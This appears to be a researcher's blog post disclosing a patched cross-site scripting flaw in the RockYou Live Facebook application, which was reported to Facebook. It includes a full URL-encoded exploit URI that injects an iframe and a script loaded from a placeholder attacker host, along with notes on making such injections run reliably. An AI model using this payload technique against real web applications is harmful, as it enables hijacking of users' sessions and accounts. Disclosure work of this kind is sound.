FAXX Hack: RockYou Live

Facebook Verified Application

Current Monthly Active Users: 9,767,698

Current Rank on Application Leaderboard: 17

Application Developer: RockYou!

Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E

Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.

By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.